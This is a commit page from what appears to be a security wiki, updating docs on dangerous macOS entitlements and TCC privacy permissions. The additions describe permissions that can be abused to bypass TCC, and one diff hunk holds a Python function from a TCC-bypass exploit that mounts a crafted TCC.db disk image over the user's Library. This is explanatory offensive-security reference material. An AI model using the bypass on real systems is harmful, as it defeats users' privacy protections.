Skip to content

Commit

Permalink
GITBOOK-4124: change request with no subject merged in GitBook
Browse files Browse the repository at this point in the history
  • Loading branch information
carlospolop authored and gitbook-bot committed Oct 15, 2023
1 parent 327e4e0 commit feebc0c
Show file tree
Hide file tree
Showing 4 changed files with 43 additions and 13 deletions.
2 changes: 1 addition & 1 deletion SUMMARY.md
Original file line number Diff line number Diff line change
Expand Up @@ -185,7 +185,7 @@
* [macOS TCC](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md)
* [macOS TCC Bypasses](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md)
* [macOS Apple Scripts](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/macos-apple-scripts.md)
* [macOS Dangerous Entitlements](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md)
* [macOS Dangerous Entitlements & TCC perms](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md)
* [macOS Users](macos-hardening/macos-security-and-privilege-escalation/macos-users.md)
* [macOS Red Teaming](macos-hardening/macos-red-teaming/README.md)
* [macOS MDM](macos-hardening/macos-red-teaming/macos-mdm/README.md)
Expand Down
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
# macOS Dangerous Entitlements
# macOS Dangerous Entitlements & TCC perms

<details>

Expand Down Expand Up @@ -38,6 +38,22 @@ This entitlement allows to **load frameworks, plug-ins, or libraries without bei

This entitlement allows to **use DYLD environment variables** that could be used to inject libraries and code. Check [**this for more info**](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_allow-dyld-environment-variables).

### **`kTCCServiceSystemPolicyAllFiles`**

Gives **Full Disk Access** permissions, one of the TCC highest permissions you can have.

### **`kTCCServiceAppleEvents`**

Allows the app to send events to other applications that are commonly used for **automating tasks**. Controlling other apps, it can abuse the permissions granted to these other apps.

### **`kTCCServiceSystemPolicySysAdminFiles`**

Allows to **change** the **`NFSHomeDirectory`** attribute of a user that changes his home folder and therefore allows to **bypass TCC**.

### **`kTCCServiceSystemPolicyAppBundles`**

Allow to modify apps inside their folders (inside app.app), which is disallowed by default.

## Medium

### `com.apple.security.cs.allow-jit`
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -26,7 +26,7 @@ It's also possible to **grant apps access** to files by **explicit intents** fro

There is a **user-mode tccd** running per logged in user defined in `/System/Library/LaunchAgents/com.apple.tccd.plist` registering the mach services `com.apple.tccd` and `com.apple.usernotifications.delegate.com.apple.tccd`.

Here you cna see the tccd running as system and as user:
Here you can see the tccd running as system and as user:

```bash
ps -ef | grep tcc
Expand All @@ -36,15 +36,17 @@ ps -ef | grep tcc

Permissions are **inherited from the parent** application and the **permissions** are **tracked** based on the **Bundle ID** and the **Developer ID**.

### TCC Database
### TCC DatabaseS

The selections is then stored in the TCC system-wide database in **`/Library/Application Support/com.apple.TCC/TCC.db`** or in **`$HOME/Library/Application Support/com.apple.TCC/TCC.db`** for per-user preferences. The databases are **protected from editing with SIP**(System Integrity Protection), but you can read them.

{% hint style="danger" %}
The TCC database in iOS is in **`/private/var/mobile/Library/TCC/TCC.db`**
The TCC database in **iOS** is in **`/private/var/mobile/Library/TCC/TCC.db`**
{% endhint %}

Moreover, a process with **full disk access** can **edit the user-mode** database.
There is a **third** TCC database in **`/var/db/locationd/clients.plist`** to indicate clients allowed to **access location services**.

Moreover, a process with **full disk access** can **edit the user-mode** database. Now an app also needs **FDA** to **read** the database.

{% hint style="info" %}
The **notification center UI** can make **changes in the system TCC database**:
Expand Down Expand Up @@ -123,6 +125,16 @@ Nota that even if one of the databases are inside the users home, **users cannot
However, remember that users _can_ **delete or query rules** using **`tccutil`** .&#x20;
{% endhint %}
#### Reset
```bash
# You can reset all the permissions given to an application with
tccutil reset All app.some.id
# Reset the permissions granted to all apps
tccutil reset All
```
### TCC Signature Checks
The TCC **database** stores the **Bundle ID** of the application, but it also **stores** **information** about the **signature** to **make sure** the App asking to use the a permission is the correct one.
Expand Down Expand Up @@ -206,7 +218,9 @@ The extended attribute `com.apple.macl` **can’t be cleared** like other extend
### TCC Bypasses
{% content-ref url="macos-tcc-bypasses/" %}
[macos-tcc-bypasses](macos-tcc-bypasses/)
{% endcontent-ref %}
## References
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -392,12 +392,12 @@ hdiutil attach -readonly -owners off -mountpoint ~/Library /tmp/tmp.dmg
```python
# This was the python function to create the dmg
def create_dmg():
os.system("hdiutil create /tmp/tmp.dmg -size 2m -ov -volname \"tccbypass\" -fs APFS 1>/dev/null")
os.system("mkdir /tmp/mnt")
os.system("hdiutil attach -owners off -mountpoint /tmp/mnt /tmp/tmp.dmg 1>/dev/null")
os.system("mkdir -p /tmp/mnt/Application\ Support/com.apple.TCC/")
os.system("cp /tmp/TCC.db /tmp/mnt/Application\ Support/com.apple.TCC/TCC.db")
os.system("hdiutil detach /tmp/mnt 1>/dev/null")
os.system("hdiutil create /tmp/tmp.dmg -size 2m -ov -volname \"tccbypass\" -fs APFS 1>/dev/null")
os.system("mkdir /tmp/mnt")
os.system("hdiutil attach -owners off -mountpoint /tmp/mnt /tmp/tmp.dmg 1>/dev/null")
os.system("mkdir -p /tmp/mnt/Application\ Support/com.apple.TCC/")
os.system("cp /tmp/TCC.db /tmp/mnt/Application\ Support/com.apple.TCC/TCC.db")
os.system("hdiutil detach /tmp/mnt 1>/dev/null")
```

Check the **full exploit** in the [**original writeup**](https://theevilbit.github.io/posts/cve-2021-30808/).
Expand Down

0 comments on commit feebc0c

Please sign in to comment.